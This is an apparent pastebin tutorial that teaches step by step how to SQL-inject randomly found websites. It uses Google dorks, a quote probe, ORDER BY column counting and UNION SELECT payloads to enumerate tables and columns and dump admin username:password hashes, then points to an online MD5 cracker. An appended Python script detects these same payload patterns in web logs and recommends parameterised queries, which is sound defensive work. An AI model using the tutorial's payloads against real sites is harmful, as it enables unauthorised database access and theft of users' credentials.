Aluf

SQL Injection - Fully Explained

Jan 31st, 2015
Welcome, here you'll find out how to SQL Inject, step by step.
_________________________________________________________________________
Find Dorks here: http://pastebin.com/4kDM5MbJ

1) Find the site you want to SQL Inject from google.com

2) Search your dorks (from the list provided) on Google.

3) Select sites and put a ' at the end of the number in the URL.

4) If you get an error (any type with a MySQL error included) or broken images (or video), it's vulnerable.

5) Now you need to do ORDER BY 100: if it says "column 100 Unknown" or the same error, go down to 25 and go down 1 each time till it has no error. Now you've found your vulnerable table. Let's inject it!

6) Okay, now once you have the table that is injectable, let's say your vuln column is 5 and you receive the error on "6": do UNION SELECT (Example: site.com/index.php?id=null union select 1,2,3,4,5--). Let's say it gives you 3 numbers, 1 & 3. Both are injectable!

7) Now let's check the version of the website. (EXAMPLE: site.com/index.php?id=null union select 1,2,@@version,4,5,6--) This will give you the version of the site!
______________________________________________
Alright, now that we've found the version (this isn't important, not exactly anyway), you're ready to find the tables, columns, and data from the database! Let's begin.
---------------------------------------------------------

8) Now we need to find the tables. You simply do this (Example: site.com/index.php?id=null union select 1,2,group_concat(table_name),4,5,6 from information_schema.tables where table_schema=database()-- ). This will get the tables of the site!

Note: keep Notepad++ or Notepad open to keep track of columns and tables
(look for username, password, email)
----------------------------------------------------------
Now we need to find the columns of the website. This is fairly easy to do!

9) Simply do this: (EXAMPLE: site.com/index.php?id=null union select 1,2,group_concat(column_name),4,5,6 from information_schema.columns where table_schema=database()-- )

After you've done this, CONGRATULATIONS, you've found the tables and columns of the website!
----------------------------|---------|--------------------------------------------------------
----------------------------|STEP 10 |--------------------------------------------------------
----------------------------|---------|--------------------------------------------------------
Now it is time to find your administrative information!
Do the steps below! Let's say you found Username and Password in your tables, and you found login in your column section!

To find your admin info do this: (EXAMPLE: site.com/index.php?id=null union select 1,2,group_concat(username,0x3a,password),4,5,6 from login-- ) You'll receive the information of all the users in the database from login: recent, old, etc.

Let's say it looks like this on the preview page!

admin:b59c67bf196a4758191e42f76670ceba

You now see a hash up top next to the : <--that.
To decrypt a hash (this is an MD5 hash) you can simply go to http://www.md5decrypter.co.uk and decrypt it. (This is usually in plain text though)

Here is a photo of the example:

http://prntscr.com/y4mag

Enjoy, I hope this helped with your SQL Injection
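
Seen from the defending side, the requests in steps 3 to 9 leave recognizable strings in a web server's access log. The following is an added example, not part of the original paste: it scans constructed log lines for those request shapes; the Common Log Format layout, the rule names and the sample lines are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Rule names are assumptions; each pattern matches a request shape from the steps above.
RULES = {
    "quote_probe": re.compile(r"=\s*\w*'\s*$"),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "version_probe": re.compile(r"@@version", re.I),
    "schema_enum": re.compile(r"\binformation_schema\.(tables|columns)\b", re.I),
    "group_concat": re.compile(r"\bgroup_concat\s*\(", re.I),
}

# Assumed log layout: Common Log Format, request field "METHOD target PROTOCOL".
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (.*) HTTP/[\d.]+" (\d{3})')

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [31/Jan/2015:10:00:01 +0000] "GET /index.php?id=5%27 HTTP/1.1" 500 312',
    '203.0.113.7 - - [31/Jan/2015:10:00:09 +0000] "GET /index.php?id=5+order+by+100-- HTTP/1.1" 500 298',
    '203.0.113.7 - - [31/Jan/2015:10:00:40 +0000] "GET /index.php?id=null+union+select+1,2,@@version,4,5,6-- HTTP/1.1" 200 1840',
    '203.0.113.7 - - [31/Jan/2015:10:01:02 +0000] "GET /index.php?id=null%20union%20select%201,2,group_concat(table_name),4,5,6%20from%20information_schema.tables-- HTTP/1.1" 200 2210',
    '198.51.100.23 - - [31/Jan/2015:10:01:30 +0000] "GET /index.php?id=5 HTTP/1.1" 200 5120',
    '198.51.100.23 - - [31/Jan/2015:10:02:11 +0000] "GET /search.php?q=student+union+election HTTP/1.1" 200 4410',
]

def classify(line):
    """Return (client_ip, status, matched_rule_names) or None if nothing matched."""
    m = REQUEST.match(line)
    if not m:
        return None
    ip, target, status = m.groups()
    query = unquote_plus(target.partition("?")[2])  # decode %27, %20 and + first
    hits = [name for name, rx in RULES.items() if rx.search(query)]
    return (ip, int(status), hits) if hits else None

def summarize(lines):
    """Collect matched rules per client IP so a probing sequence stands out."""
    seen = {}
    for line in lines:
        result = classify(line)
        if result:
            ip, _status, hits = result
            seen.setdefault(ip, set()).update(hits)
    return seen

if __name__ == "__main__":
    for ip, rules in summarize(SAMPLE_LOG).items():
        print(ip, sorted(rules))
```

Matches like these only show that probing took place; the durable fix is to bind the id value as a query parameter in the application rather than concatenating it into the SQL string.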